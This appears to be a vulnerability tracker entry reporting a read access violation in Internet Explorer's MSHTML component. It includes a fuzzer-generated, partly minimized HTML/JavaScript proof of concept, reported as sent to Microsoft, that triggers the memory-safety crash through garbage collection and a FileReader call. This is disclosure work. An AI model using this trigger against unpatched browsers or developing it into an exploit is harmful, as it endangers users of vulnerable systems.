|
|
Microsoft Internet Explorer: Read AV in MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal | |
| Project Member Reported by mbarbella@google.com, May 17 2016 | Back to list | |
Still working on a minimized PoC, but attached the unminimized one for the time being. It's a bit flaky, so it's proving to be a little tough. Looks like bug filing from CF was broken with the transition to Monorail (I can fix that soon), but in the meantime the report is https://cluster-fuzz.appspot.com/testcase?key=5178133082275840
,
Aug 11 2016
|
||
| ► Sign in to add a comment | ||
Here's the (improve but not perfect) minimized test case. Sent it to MS today: <script> function eventhandler1() { CollectGarbage(); } function eventhandler5() { try { /*FileReader*/ var var00063 = new FileReader(); } catch(err) { } //line 68 try { /*Blob*/ var var00064 = new Blob(); } catch(err) { } //line 69 try { var00063.readAsDataURL(var00064); } catch(err) { } //line 70 } </script> </noembed> <applet onmouseout="eventhandler6()" truespeed="-1.86811e+009" spellcheck="A" frameborder="all" pluginurl="bottom" link="-32" part="file" ononline="eventhandler1()" onwebkittransitionend="eventhandler10()" onerror="eventhandler5()" char="void" direction="-1">iiThS9l_J8 </xmp> </select>A7 <object results="object" default="black" aria_checked="1" action="row" onwebkitanimationiteration="eventhandler4()" playcount="bottom" playcount="poly" onsearch="eventhandler4()" oninput="eventhandler9()" translate="left" for="1" checked="-0.155515%" aria_selected="hsides" onerror="eventhandler1()" aria_valuemin="file">